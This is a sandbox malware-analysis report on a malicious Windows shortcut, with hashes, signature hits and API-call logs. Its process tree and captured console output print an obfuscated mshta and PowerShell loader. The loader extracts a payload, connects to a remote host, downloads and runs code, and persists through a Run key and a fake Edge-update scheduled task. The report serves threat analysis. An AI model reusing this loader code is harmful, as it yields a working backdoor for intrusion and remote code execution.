Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 13, 2025, 9:51 a.m.	March 13, 2025, 9:53 a.m.

Size	7.1KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Tue Sep 10 06:24:55 2024, mtime=Wed Sep 11 23:18:02 2024, atime=Tue Sep 10 06:24:55 2024, length=43520, window=hide
MD5	`5bd8cad0e4f14e252056830d16abfbe5`
SHA256	`811d221a1340e64aa1736d9d4e8f80820a5a02fab3d0c9e454f3ed35cd717b81`
CRC32	`46CAB6CC`
ssdeep	`192:8jYn8gJsquw7a0ZwMzefeofRezpwxHzdHxzxG+zUYj:RfJ5aszTzmLzxGUj`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "gHEbvcWRQwMormhX" C:\Users\test22\AppData\Local\Temp\ECRM.hwp.lnk
2988
- mshta.exe "C:\Windows\System32\mshta.exe" javascript:p="$w ([byte[]]($f "+"| select -Skip 0x0beb)) -Force";k="c:\\pro"+"gramdata\\";b=" -Encoding Byte;sc ";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c="powe"+"rshell -ep bypass -c $t=0x1c4c;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:T"+"EMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+k+"e.ps1';$f=gc $k"+b+p+b+k+"d3914 0;po"+"wersh"+"ell -ep bypass -f $w;";eval(s);
  944
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x1c4c;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\*\*.lnk | where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f | select -Skip 0x0beb)) -Force -Encoding Byte;sc c:\programdata\d3914 0;powershell -ep bypass -f $w;
    2324
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\e.ps1
      2468
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c " Invoke-Expression (Get-Content C:\\ProgramData\\AN9385.tmp);"
        1652

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
64.20.59.148	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (19 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2025, 9:51 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 13, 2025, 9:51 a.m.			0	0
IsDebuggerPresent March 13, 2025, 9:51 a.m.			0	0
IsDebuggerPresent March 13, 2025, 9:51 a.m.			0	0

Command line console output was observed (50 out of 151 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: Commands : System.Management.Automation.PSCommand console_handle: 0x0000001f	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: Streams : System.Management.Automation.PSDataStreams console_handle: 0x00000023	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: InstanceId : 565edbba-42c5-4fca-bd20-46e32fe17f10 console_handle: 0x00000027	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: InvocationStateInfo : System.Management.Automation.PSInvocationStateInfo console_handle: 0x0000002b	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: IsNested : False console_handle: 0x0000002f	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: Runspace : console_handle: 0x00000033	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: RunspacePool : System.Management.Automation.Runspaces.RunspacePool console_handle: 0x00000037	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: Invoke-History : A positional parameter cannot be found that accepts argument ' console_handle: 0x00000023	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: At line:8 char:951 console_handle: 0x0000003b	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: + try{$r = $Usbbc[0];$p = $Usbbc[1]; $tc = New-Object System.Net.Sockets.Tcp console_handle: 0x00000047	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: Client($r, $p);$strm = $tc.GetStream();$q=New-Object System.IO.StreamReader($st console_handle: 0x00000053	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: rm);$z = '';while ($strm.DataAvailable -or $q.Peek() -ne -1 ) {$t1=$q.ReadLine( console_handle: 0x0000005f	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: ); $z += $t1;}if($z.Length -ne 0){$b=[Convert]::FromBase64String($z);$t='c:\\pr console_handle: 0x0000006b	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: ogramdata\\k.zip';Set-Content -Path $t -V $b -Encoding Byte;Expand-Archive -Pat console_handle: 0x00000077	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: h $t -D 'C:\\Programdata';del $t;$kic1='ws\\system'+'32\\wscr'+'ipt.exe //b //e console_handle: 0x00000083	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: '+':javascr'+'ipt C:\\Progra'+'mData\\N9371.js" /f';$qoc='dows\CurrentVersion\R console_handle: 0x0000008f	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: u'+'n" /v SUpdat'+'e /t REG_SZ /d "c:\\windo'+ $kic1;$tmp2='KCU\Software\Mi'+'c console_handle: 0x0000009b	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: rosoft\Win'+$qoc;$untiy = 'r';$tmp1='eg add "H';$tmp3=$tmp1+$tmp2;$trn1=$untiy+ console_handle: 0x000000a7	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: $tmp3;cmd /c $trn1;$g = 'sch'+'tasks /create /sc minute /mo 2 /tn AM'+'icrosoft console_handle: 0x000000b3	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: E'+'dgeUpdate'+'Expanding'+'[3829710973] /tr "ws'+'cript //e:ja'+'vascr'+'ipt / console_handle: 0x000000bf	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: /b C:\\Pr'+'ogramData\\38243.tmp" /f';cmd /c $g;$strm.close();}}catch{};while($ console_handle: 0x000000cb	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: true){r <<<< = $Usbbc[0];$p2 = $Usbbc[2];$tc2 = New-Object System.Net.Sockets. console_handle: 0x000000d7	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: TcpClient($r, $p2);$st2 = $tc2.GetStream();$r2 = New-Object System.IO.StreamRea console_handle: 0x000000e3	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: der($st2);$c = '';while ($st2.DataAvailable -or $r2.Peek() -ne -1 ) {$t2=$r2.Re console_handle: 0x000000ef	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: adLine(); $c += $t2;}if($c.Length -ne 0){$TSbbcnv1 = "c:\programdata\tmps2.ps1" console_handle: 0x000000fb	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: ;$c \| Out-File $TSbbcnv1;powershell -ep bypass -f $TSbbcnv1;del $TSbbcnv1;}Slee console_handle: 0x00000107	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: p(20);} console_handle: 0x00000113	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Invoke-History], Parameter console_handle: 0x0000011f	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: BindingException console_handle: 0x0000012b	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x00000137	1	1
WriteConsoleW March 13, 2025, 9:51 a.m.	buffer: .Commands.InvokeHistoryCommand console_handle: 0x00000143	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: Invoke-History : A positional parameter cannot be found that accepts argument ' console_handle: 0x00000023	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: At line:8 char:951 console_handle: 0x0000003b	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: + try{$r = $Usbbc[0];$p = $Usbbc[1]; $tc = New-Object System.Net.Sockets.Tcp console_handle: 0x00000047	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: Client($r, $p);$strm = $tc.GetStream();$q=New-Object System.IO.StreamReader($st console_handle: 0x00000053	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: rm);$z = '';while ($strm.DataAvailable -or $q.Peek() -ne -1 ) {$t1=$q.ReadLine( console_handle: 0x0000005f	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: ); $z += $t1;}if($z.Length -ne 0){$b=[Convert]::FromBase64String($z);$t='c:\\pr console_handle: 0x0000006b	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: ogramdata\\k.zip';Set-Content -Path $t -V $b -Encoding Byte;Expand-Archive -Pat console_handle: 0x00000077	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: h $t -D 'C:\\Programdata';del $t;$kic1='ws\\system'+'32\\wscr'+'ipt.exe //b //e console_handle: 0x00000083	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: '+':javascr'+'ipt C:\\Progra'+'mData\\N9371.js" /f';$qoc='dows\CurrentVersion\R console_handle: 0x0000008f	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: u'+'n" /v SUpdat'+'e /t REG_SZ /d "c:\\windo'+ $kic1;$tmp2='KCU\Software\Mi'+'c console_handle: 0x0000009b	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: rosoft\Win'+$qoc;$untiy = 'r';$tmp1='eg add "H';$tmp3=$tmp1+$tmp2;$trn1=$untiy+ console_handle: 0x000000a7	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: $tmp3;cmd /c $trn1;$g = 'sch'+'tasks /create /sc minute /mo 2 /tn AM'+'icrosoft console_handle: 0x000000b3	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: E'+'dgeUpdate'+'Expanding'+'[3829710973] /tr "ws'+'cript //e:ja'+'vascr'+'ipt / console_handle: 0x000000bf	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: /b C:\\Pr'+'ogramData\\38243.tmp" /f';cmd /c $g;$strm.close();}}catch{};while($ console_handle: 0x000000cb	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: true){r <<<< = $Usbbc[0];$p2 = $Usbbc[2];$tc2 = New-Object System.Net.Sockets. console_handle: 0x000000d7	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: TcpClient($r, $p2);$st2 = $tc2.GetStream();$r2 = New-Object System.IO.StreamRea console_handle: 0x000000e3	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: der($st2);$c = '';while ($st2.DataAvailable -or $r2.Peek() -ne -1 ) {$t2=$r2.Re console_handle: 0x000000ef	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: adLine(); $c += $t2;}if($c.Length -ne 0){$TSbbcnv1 = "c:\programdata\tmps2.ps1" console_handle: 0x000000fb	1	1
WriteConsoleW March 13, 2025, 9:52 a.m.	buffer: ;$c \| Out-File $TSbbcnv1;powershell -ep bypass -f $TSbbcnv1;del $TSbbcnv1;}Slee console_handle: 0x00000107	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 151 events)

Time & API	Arguments	Status	Return
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007620c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761a08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761a08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761a08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761a08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761a08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761a08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761bc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00762008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00761ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007615c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007615c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007615c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007615c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007615c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007615c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x007615c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002a1788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002a1e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002a1e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002a1e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2025, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002a18c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 13, 2025, 9:51 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 448 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74082000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fc3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03c20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03c20000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x716f1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x716f2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
